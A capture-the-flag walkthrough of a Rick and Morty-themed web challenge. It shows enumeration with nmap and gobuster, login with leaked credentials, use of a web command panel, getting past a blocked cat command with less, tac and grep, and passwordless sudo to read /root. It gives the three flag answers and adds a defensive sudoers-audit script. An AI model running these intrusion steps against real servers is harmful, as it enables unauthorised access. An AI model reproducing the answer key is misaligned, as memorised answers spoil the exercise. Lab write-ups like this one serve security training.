This Rick and Morty-themed challenge requires you to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
The first step in any penetration testing engagement is thorough reconnaissance and enumeration.
sudo nmap -A -T 4 -v -oN scan_results <target-ip>
The Nmap scan reveals an Apache web server running on port 80.
Navigating to the website (http://
Checking the page source reveals a username comment:
Username found: R1ckRul3s
Using Gobuster to enumerate directories and files:
gobuster dir -u http://<target-ip> -x php,html,css,js,txt,pdf -w <wordlist>
This reveals hidden directories and files:
The robots.txt file contains:
Wubbalubbadubdub
This appears to be a password. Testing the portal.php login form with:
The login succeeds and reveals a command panel, essentially a web shell for executing Linux commands.
The command panel allows execution of Linux commands. Testing with:
ls -la
This reveals the files in the current directory, including:
Note: The cat command is blocked, so alternative methods are needed.
To read the first ingredient file without using cat:
less Sup3rS3cretPickl3Ingred.txt
OR
tac Sup3rS3cretPickl3Ingred.txt
OR
grep . Sup3rS3cretPickl3Ingred.txt
First Ingredient: mr. meeseek hair
Reading the clue.txt file:
less clue.txt
This gives a hint to "look around the file system". Checking the /home directory:
ls /home
This reveals the rick and ubuntu users. Exploring rick's directory:
ls /home/rick
This finds a file named "second ingredients". Reading it:
tac "/home/rick/second ingredients"
Second Ingredient: 1 jerry tear
Current user is www-data. Checking sudo privileges:
sudo -l
This reveals that www-data can run any command as root without a password! Listing the root directory:
sudo ls /root
This finds 3rd.txt. Reading the file:
sudo less /root/3rd.txt
Third Ingredient: fleeb juice
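The sudo -l result above means the web server account holds passwordless root, which a sudoers audit should catch. As an added example (not part of the original write-up), this Python script scans sudoers text for that pattern; the sample rules, the service-account list and the severity labels are constructed assumptions.

```python
import re

# Constructed sample in sudoers syntax; not copied from the challenge machine.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: ALL
deploy   ALL=(ALL) NOPASSWD: /bin/systemctl restart app, ALL
"""

# Assumption: accounts that run network-facing daemons and should hold no sudo rights.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "daemon"}
RULE = re.compile(r"^(\S+)\s+[^\s=]+\s*=\s*(.+)$")   # principal host = spec
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")              # e.g. "NOPASSWD: NOEXEC: "

def audit_sudoers(text):
    """Return (line_no, principal, severity) for each risky user specification."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments; include files are not followed
        m = RULE.match(line)
        if not m or line.startswith("Defaults") or "_Alias" in line:
            continue
        principal, spec = m.groups()
        spec = re.sub(r"\([^)]*\)", "", spec)  # Runas lists can contain commas; drop them
        nopasswd = nopasswd_all = False
        for item in spec.split(","):
            item = item.strip()
            tags = TAGS.match(item)
            if tags:  # a tag stays in force for the following commands in the list
                if "NOPASSWD:" in tags.group():
                    nopasswd = True
                elif "PASSWD:" in tags.group():
                    nopasswd = False
                item = item[tags.end():].strip()
            if item == "ALL" and nopasswd:
                nopasswd_all = True
        service = principal in SERVICE_ACCOUNTS
        if nopasswd_all or service:
            severity = ("critical" if service else "high") if nopasswd_all else "review"
            findings.append((line_no, principal, severity))
    return findings

if __name__ == "__main__":
    for line_no, principal, severity in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {line_no}: {principal}: {severity}")
```

The parser ignores aliases and line continuations, so treat a clean result as a first pass and confirm with visudo -c and a manual review of /etc/sudoers.d.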
Answer: mr. meeseek hair
Answer: 1 jerry tear
Answer: fleeb juice